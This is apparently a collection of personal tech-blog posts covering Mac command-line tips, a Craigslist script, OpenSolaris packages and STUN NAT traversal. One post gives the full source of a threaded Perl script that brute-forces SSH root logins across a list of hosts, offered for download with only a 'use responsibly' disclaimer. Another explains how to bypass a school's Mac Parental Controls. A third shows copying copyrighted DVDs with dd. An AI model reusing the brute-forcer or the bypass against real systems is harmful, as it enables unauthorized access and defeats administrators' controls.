Full Blackout

I found a great easy tool, called Calaboration, to import your Google Calendars into iCal. It imports all your calendars for you in about 2 steps. Check it out for yourself!

Download Collaboration Here:
http://code.google.com/p/calaboration/

Recently I’ve been looking for places to live on CraigsList, and started getting really tired of following cheezy headline links to see pictures of the rental’s. It started making me think, Surely someone wrote a program to fix this! Indeed they have! Here is an awesome greesemonkey script that will show you images for each craigslist add on the search results page, just under the actual page link.

To use this plugin first install the Greese Monkey firefox addon here => Greese Monkey

Next, just click this link to install the Greese Monkey, Craigslist Inline script:
http://jeffpalm.com/craigslist/0.6/craigslist.user.js

Now checkout craigslist! It’s SOOOOOO much better! You can browse listings 10 times fater than before, and put your GPU to good use.

Hey guys,

For a Network Security class I had to try and break into other peoples machines, and thought I would share my work with everyone. Attached is the threaded SSH brute forcing script I created. Please use this script responsibly! Only use it on machines you own, or are authorized to do security tests on.

Dependencies:

Net::OpenSSH, download from from cpan

Here is a download link for SSH_IT : ssh_it.pl

Here is the source code to peak at before downloading:

#!/usr/bin/perl -w
 
#Copyright (C) 2009  Jason Ederle
#contact me at jason.ederlegmail.com
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program.  If not, see .
#
#Notice:
#Please do not use this tool on machines you do not own
#or do not have written permission to brute force. You are
#resposible for you own actions.
#
 
use strict;
 
use threads;
use threads::shared;
use Net::OpenSSH;
 
my $verbose = 1;
 
if( scalar(@ARGV) < 2 ){
	print "usage: ssh_brute_force.pl
   (optional)\n";
	exit(1);
}
 
#password and host files
my $pfile = shift @ARGV;
my $hFile = shift @ARGV;
 
open PFILE, "$pfile" or die "Can't open password file";
my @passwords : shared =
;
close PFILE;
 
open HFILE, "$hFile" or die "Can't open host file";
my @hosts : shared = ;
close HFILE;
@hosts = removeEmptyElements(@hosts);
 
#brute force the root user
my $user = "root";
 
#file for discovered passwords
open GOOD, ">found_passwords.txt";
 
#shared thread variables
my $tryCount : shared = 0;
my $foundCount : shared = 0;
my $talkLock : shared;
 
#determine number of threads to use
my $numberOfThreads;
 
if(scalar @ARGV > 0){
	$numberOfThreads = shift @ARGV;
}else{
	$numberOfThreads = scalar(@hosts) * 2;
}
 
#tell user where where about to do.
print "Starting $numberOfThreads threads to try "
. scalar @passwords . " passwords against " . scalar @hosts . " hosts.\n\n";
 
#build threads and start smashing the ssh daemons
my @threads;
for(my $i=0; $i<$numberOfThreads; $i++){
	push(@threads, threads->new(\&thread_brute) );
}
 
#wait for all threads to finish
foreach my $thr (@threads){
	$thr->join();
}
 
#process password file agaist all hosts
sub thread_brute {
 
	#Let threads process queue of passwords until it's empty
	while(scalar @passwords > 0){
 
		my $pass;
 
		{
			lock(@passwords);
			$pass = shift(@passwords);
		}
 
		$pass =~ s/\s+//g;
 
		if(length($pass) == 0){
			next;
		}
 
		#try password on each host
		foreach my $host (@hosts){
 
			$host =~ s/\s+//g;
 
			if(length($host) == 0){
				next;
			}	
 
			if($verbose){
				{
					lock( $talkLock );
					print "trying host:$host user:$user pass:$pass thread:" . threads->tid() . "\n";
				}
			}
 
			#new ssh object
			my $ssh = Net::OpenSSH->new (
		    	host => $host,
		    	password=> $pass,
		    	user => $user,
				strict_mode => 0,
				timeout => 6
			);	
 
			my $eStr = $ssh->error;
 
			#check for failed login message
			if ( $eStr =~ /unable to establish/i ) {
 
			    {
					lock($tryCount);
 
					#not the password, but track the progress
					$tryCount += 1;
			    }
 
			    #status message
			    if($tryCount % 10 == 0){
						{
							lock( $talkLock );
							print "Progress: Tried:$tryCount Found:$foundCount\n";
						}
				}
 
			}else{
 
				{
					#log good password to file
				    lock($foundCount);
				    print GOOD "host:$host password:$pass\n";
				    $foundCount += 1;
				}
 
				#log to file
				{
					lock( $talkLock );
			    	print "SSH HACKED - host:$host password:$pass\n";
				}
 
			}		
 
		}
 
	}			
 
}
 
#remove empty array entries
sub removeEmptyElements {
	my @full;
	my @a = shift @_;
	foreach my $elem (@a){
		if($elem !~ /^\s+$/){
			push(@full, $elem);
		}
	}	
 
	return @full;
}

I finally got around to learning how to use the mdfind tool that hooks into the Mac OS X Spotlight find utility. It’s really simple to use, but here’s a few tips so you don’t have to read the man pages.

Spotlight likes to index your files and pull out meta data, kind of like how mp3 has ID3 tags about songs.  You can view these Spotlight meta data tags by using the tool mdls. This will print out all the tags that spotlight has associated with a file.

Example of mdls:

#sample of doing mdls on an mp3 file to show what is 'spotlight searchable'
jason$ mdls "04 Heretics.mp3"
 
#Produces This Output
kMDItemAlbum                    = "Armchair Apocrypha"
kMDItemAudioBitRate             = 104
kMDItemAudioChannelCount        = 2
kMDItemAudioEncodingApplication = "Exact Audio Copy   (Secure mode)"
kMDItemAudioSampleRate          = 44100
kMDItemAudioTrackNumber         = "4"
kMDItemAuthors                  = (
    "Andrew Bird"
)
kMDItemContentCreationDate      = 2007-09-23 23:56:01 -0400
kMDItemContentModificationDate  = 2007-12-21 13:10:54 -0500
kMDItemContentType              = "public.mp3"
kMDItemContentTypeTree          = (
    "public.mp3",
    "public.audio",
    "public.audiovisual-content",
    "public.data",
    "public.item",
    "public.content"
)
kMDItemDisplayName              = "04 Heretics.mp3"
kMDItemDurationSeconds          = 213
kMDItemFSContentChangeDate      = 2007-12-21 13:10:54 -0500
kMDItemFSCreationDate           = 2007-09-23 23:56:01 -0400
kMDItemFSCreatorCode            = ""
kMDItemFSFinderFlags            = 0
kMDItemFSHasCustomIcon          = 0
kMDItemFSInvisible              = 0
kMDItemFSIsExtensionHidden      = 0
kMDItemFSIsStationery           = 0
kMDItemFSLabel                  = 0
kMDItemFSName                   = "04 Heretics.mp3"
kMDItemFSNodeCount              = 0
kMDItemFSOwnerGroupID           = 20
kMDItemFSOwnerUserID            = 501
kMDItemFSSize                   = 5525632
kMDItemFSTypeCode               = ""
kMDItemKind                     = "MP3 Audio File"
kMDItemLastUsedDate             = 2008-07-31 20:12:02 -0400
kMDItemMediaTypes               = (
    Sound
)
kMDItemMusicalGenre             = "Indie"
kMDItemRecordingYear            = 2007
kMDItemTitle                    = "Heretics"
kMDItemTotalBitRate             = 104
kMDItemUsedDates                = (
    2008-07-31 00:00:00 -0400
)

Now tha you know the names of the kMD* tags, you can search spotlight with them. For example in the about output you can see that spot has a tag that tracks the type of file, here it’s “kMDItemKind = ‘MP3 Audio File’ “. We can easily find all mp3’s on our computer by doing this command:

#show me all the mp3 files in my home directory
$ mdfind -onlyin "$HOME"  "kMDItemKind == 'MP3 Audio File'"

Or you can use wild cards to show all the Audio Files in your home directory

#show me all audio files in my home directory
$ mdfind -onlyin "$HOME"  "kMDItemKind == '*Audio File'"

If you want to find a keyword that may be in ANY of the indexed fields, you can do a broader search ( that might be less relevant) by doing this:

#find all files that have the word "Audio" in one of it's kMD* tags
$ mdfind -onlyin "$HOME" Audio

That’s the basic’s of how to use mdfind with the indexed keys. Hope that helps someone.

Today I was at school and noticed that they try to lock down the computers using the Mac OS X Parental Control tools in the Preference Panel. It only took about 10 minutes to figure out how to beat their restrictions on launching non-approved Applications. My hack helped me start a java based application and bypassed the Parental Controls completely.

This is what I did.

1.) Open up the Terminal.app program, on my computer this was not restricted oddly enough.
2.) Change directory to inside your applications, ex: cd MyApp.app/Contents/
3.) Locate the main .jar file, usually named after the application and not inside a lib folder
4.) start the application manually with this command:

java -jar your_application.jar

If your application crashes, or doesn’t seem to start up you may need to check the Info.plist file for runtime arguments ( passed after -jar command ) or system property values ( passed with -Dname=value ) that need to be set.

I also found that I couldn’t install my application, so I just copied it into the ~/Library. I Hope this helps, there’s nothing more annoying than having a locked down computer!

This Christmas I bought my dad a Sony digital picture frame. It looked great, had all sorts of interesting features, except there was one problem, it froze up on certain pictures. After looking over the user manual we noticed a small footnote that mentioned that the pictures all had to be in DSC format. Hum.. well what the heck is that! The first thing that came to my mind was how, when you plug in your camera to you computer to retrieve your photos, all the pictures are labeled DSC1.JPG, DSC2.JPG, … etc. It turns out that if you change the names of these DSC labeled photos to meaningful names like “Mom & Dad at Christmas.jpg” it will cause the picture frame to crash!

The picture frame is making the assumption that you are pulling the memory stick straight out of your camera and plugging it into the picture frame without modifying any of these names. The easy solution is to make sure all your pictures are labeled in uppercase with no spaces or special characters. I hope this helps, and the picture frame works great after your done.

I just recently started using OpenSolaris on a cloud cluster with Joyent , and quickly realized that I didn’t have the first clue how to install things! But, just like yum, apt-get, aptitude, port, etc,… there’s a package manager for OpenSolaris. The difference, and pain in the butt, is that you have to install it yourself first. The package manager is called Blastwave, and you install packages using the pkg-get command similar to apt-get. Here’s how to get up and running quickly.

Step 1) install blastwave

pkgadd -d http://blastwave.network.com/csw/pkg_get.pkg

Step 2) Update package list

pkg-get -U

Step 3) Install whatever you want, let’s install webalizer to look at log files.

sudo pkg-get install webalizer

If you get any error messages like ** ERROR: cpio … , try switching to root user with ’su root’ instead of using the sudo command. I had a similar problem and root works best for me.

Read more about Blastwave and configuration instructions here.

I’ve been doing tons of php programming lately and with that usually comes lots of MySQL programming also. An easy way to avoid getting SQL injected is to use this php function mysql_real_escape_string. Here’s a trivial example:

<?php
 
//get user's unsafe string 
$unsafeInput = $_GET["password"];
 
//make users string safe for sql queries and avoid sql injections
$safeInput = mysql_real_escape_string($unsafeInput);
 
//use the safe input in a query
... 
?>

source code - STUNUtility.java
Important Note  - Rename the above download to STUNUtility.java, my blog tool lowercases all files when I  upload them, and java will complain when you compile if uncorrected.

Here’s the long overdue part 2 of the nat traveral post. Crossing NAT’s souds much more difficult than it is in reality. After doing lot’s of research and testing different libraries, I discovered Stun4J. The library works really well, but It’s API was a little difficult for me to just jump straight into. So I did what any programmer should do, I read the source code =) !

I made a small wrapper class that makes using Stun4J Really Really Really Easy. Long story short you can jump a NAT in about 3 lines of code! I wish someone game me this !!!!! The class is called STUNUtility and there is a sample main function that will find your computers NAT mapping. After you find this NAT mapping, computers outside your LAN can connect to the returned public IP and public Port. This library only works on 2 of the 3 major types of NAT’s though. I’ve been unable to figure out how to traverse symmetric NAT’s and would appreciate any ideas for help if you know (other than proxy servers)!

Before you run STUNUtility, make sure you have Stun4J.jar in your java classpath. Unfortunately, Stun4J doesn’t let you download a jar file (please correct me if this is wrong), so in order to get this to work I checked out their cvs code and compiled it with ant.  You can find the Stun4J cvs and compile it yourself or download pre-compiled Stun4J.jar that I created for myself.

Here’s the main function, and the comments should pretty much explain everything.

    /**
     * Demo class to find your NAT routing information.
     */
    public static void main(String[] args) {
 
        try {
 
            //this is apublic stun server. It might go down after posting this, so you should really setup your own.
            String stunServerAddress = new String("stun.xten.net");
 
            //this is the port that most stun services run on
            int stunServerPort = 3478;
 
            //this is the port your program wants to be able to use.
            //The stun program will find the NAT mapping of this port,
            //and find the public IP address and port number that internet users
            //can connect to you with.
            int aLocalPortYouWantToUse = 2525;
 
            //create a stun utility tool (makes stun4j a little easier)
            STUNUtility stun = new STUNUtility(stunServerAddress, stunServerPort, aLocalPortYouWantToUse);
 
            //talk to the stun server and figure out the NAT information
            stun.performSTUNLookup();
 
            //now print out the info that users outside the internet can use to connect to you.
            logger.info("Internet users can connect to my IP address " + stun.getPublicIP() + " and port " + stun.getPublicPort());
 
        } catch (Exception e) {
            logger.severe("Failed to lookup NAT information via STUN: " + e.getMessage());
        }
 
    }

An essential building block to understanding, breaking, or fixing computers begins by becoming best friends with the command line. Here’s a great site that’s made a list and description of the best Mac OS X hacking tools.

Copy a DVD/CD disk ( even copyrighted ones ) easily:

/bin/dd if=/dev/disk2 of=mydvd.iso

Watch TCP connections in realtime:

/usr/sbin/tcpdump -i en1  //spy on my wireless card

Get your computer to speak:

/usr/bin/say "Hi there, I'm Mac OS X"

Screw with application settings:

/usr/bin/defaults

Here you can alter Mac OS X system default preferences and reveal many hidden features in the mac os x operating system. For example… here you can get rid of the 3-D 10.5 Dock, and use a 10.4 2-D dock:

defaults write com.apple.dock no-glass -boolean YES; killall Dock

Defaults also control your Desktop background.. and Much Much More.. check it out!

ps.. many other applications store their data with the defaults program.. you can do cheap hacks by manipulating their info.. have fun!